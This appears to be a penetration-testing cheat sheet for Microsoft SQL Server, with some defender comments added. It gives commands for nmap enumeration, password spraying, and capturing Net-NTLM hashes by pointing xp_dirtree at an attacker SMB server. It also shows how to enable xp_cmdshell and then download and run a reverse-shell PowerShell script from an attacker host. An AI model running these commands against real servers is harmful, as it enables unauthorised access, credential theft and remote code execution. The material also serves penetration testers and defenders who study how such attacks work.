Pentest - MSSQL - Microsoft SQL Server (port 1433)
Pentest Microsoft SQL Server
Enumeration
# NSE ms-sql-* scripts against the default instance port. Note the blank
# mssql.password= : this is the empty-'sa'-password check, so scripts that
# need a session only return data if that default credential is still live.
# ms-sql-dump-hashes needs sysadmin on the instance — TODO confirm for the Nmap version in use.
# Defender note: the scripts that authenticate generate TDS logins; failed
# logins are written to the SQL Server error log by default.
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
Test credentials
# Tries the user and password lists against the MSSQL service. Every attempt
# is a separate login; failed logins are written to the SQL Server error log
# by default, so this is noisy and straightforward to alert on.
crackmapexec mssql <host> -u users.txt -p passwords.txt
Establish connection
# Interactive TDS client. -windows-auth selects Windows authentication with a
# domain account instead of a SQL login; -dc-ip names the domain controller
# used for that authentication.
impacket-mssqlclient -dc-ip <ip> -windows-auth domain/username:password@host
List DBs
-- Enumerate database names. sysdatabases is the legacy compatibility view;
-- master.dbo.sysdatabases is the same object written with its schema spelled out.
SELECT name FROM master.dbo.sysdatabases;
Check permissions
-- Show which logins/roles have been granted or denied EXECUTE on the
-- extended procedures below, i.e. whether the current login can call them.
USE master;
EXEC sp_helprotect @name = 'xp_dirtree';
EXEC sp_helprotect @name = 'xp_subdirs';
EXEC sp_helprotect @name = 'xp_fileexist';
xp_dirtree
-- List the web root through the SQL Server service account.
-- Arguments: path, depth (1 = this level only), include files (1 = yes).
EXECUTE master.dbo.xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
Use xp_dirtree to obtain NTLM hashes
#victim
# Handing xp_dirtree a UNC path makes the SQL Server service account
# authenticate to the attacker-controlled SMB host, where the Net-NTLM
# challenge/response is captured (the "NTLM hashes" of the heading).
xp_dirtree \\<attacker_ip>\file.txt
#attacker
# impacket-smbserver answers the SMB request and records the authentication.
# Defender note: block outbound SMB (445) from database servers and restrict
# EXECUTE on xp_dirtree to sysadmin so non-privileged logins cannot trigger this.
sudo impacket-smbserver -smb2support share $(pwd)
xp_cmdshell
Enable xp_cmdshell, run a command, launch a reverse shell
# impacket-mssqlclient helper commands. enable_xp_cmdshell switches the
# xp_cmdshell option on via sp_configure, which needs sysadmin; the option
# change is written to the SQL Server error log and is a common detection
# trigger — keep xp_cmdshell disabled and alert on sp_configure changes.
enable_xp_cmdshell
# OS commands execute as the SQL Server service account.
xp_cmdshell whoami
# Stage a script from the attacker host, then execute it.
xp_cmdshell powershell -c iwr http://<ip>/shell.ps1 -o C:\programdata\rev.ps1
xp_cmdshell powershell -c C:\programdata\rev.ps1
Reference: hacktricks